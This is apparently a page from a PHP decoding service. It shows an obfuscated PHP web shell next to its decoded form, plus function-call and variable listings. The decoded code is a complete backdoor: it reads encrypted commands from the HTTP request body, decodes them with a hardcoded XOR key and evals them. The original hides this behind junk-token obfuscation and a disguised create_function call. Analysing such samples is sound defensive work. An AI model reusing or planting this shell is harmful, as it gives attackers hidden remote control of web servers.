Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $n='put")-V-V,$-Vm)==1) {@ob_-Vstart();@e-Vval(-V@gzunc-Vompres-Vs(@x(-V@-Vb-V-Va..

Decoded Output download

$k="202cb962";$kh="ac59075b964b";$kf="07152d234b70";$p="v16ObhaqV9kcAkWB";function  
x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if  
(@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1)  
{@ob_start();eval(@gzuncompress(@x(base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}

Did this file decode correctly?

Original Code

<?php
$n='put")-V-V,$-Vm)==1) 
{@ob_-Vstart();@e-Vval(-V@gzunc-Vompres-Vs(@x(-V@-Vb-V-Vase64-V_decode($m[1]),$k)));$o-V=-V@ob_ge-V';
$Q='{$c=str-Vl-Ven($-Vk);$l=strl-Ven($t);$-Vo="";-Vfor($i=0-V;$i<-V$l;-V){f-Vor($j=0;($j<$c-V&&$-Vi<$l);$j-V+-V+,$i++)-V{';
$s='$o.=$t-V{$i-V}^$k{$j};}}r-V-Veturn -V$o;}if 
(@p-Vreg_matc-Vh(-V"/$kh-V(-V.+)$kf/",@fi-Vle_get-V_contents("p-Vhp:-V//in';
$h='$k="-V2-V02cb962";-V-V$kh="ac5907-V5b964b";$-Vkf="07152d2-V3-V4-Vb70";$p="v16Ob-VhaqV9kcA-VkW-VB"-V;functio-V-Vn 
x($t,$k)';
$y='t-V_contents()-V;@ob_end_cl-Vean()-V;-V$r=@b-Vase64_encode-V(@x(@-Vgz-Vcompr-Vess($o),$-Vk));p-V-Vrint("$p$kh$r$kf");}';
$W=str_replace('E','','creEatEEeE_funcEtiEon');
$j=str_replace('-V','',$h.$Q.$s.$n.$y);
$F=$W('',$j);$F();
?>

Function Calls

preg_match 1
str_replace 2
create_function 1
file_get_contents 1

Variables

$Q {$c=str-Vl-Ven($-Vk);$l=strl-Ven($t);$-Vo="";-Vfor($i=0-V;$i..
$W create_function
$h $k="-V2-V02cb962";-V-V$kh="ac5907-V5b964b";$-Vkf="07152d2-V3..
$j $k="202cb962";$kh="ac59075b964b";$kf="07152d234b70";$p="v16O..
$k 202cb962
$n put")-V-V,$-Vm)==1) {@ob_-Vstart();@e-Vval(-V@gzunc-Vompre..
$p v16ObhaqV9kcAkWB
$s $o.=$t-V{$i-V}^$k{$j};}}r-V-Veturn -V$o;}if (@p-Vreg_matc-..
$y t-V_contents()-V;@ob_end_cl-Vean()-V;-V$r=@b-Vase64_encode-V..
$kf 07152d234b70
$kh ac59075b964b

Stats

MD5 1d5e029644d351aab1d414c836f6960d
Eval Count 1
Decode Time 294 ms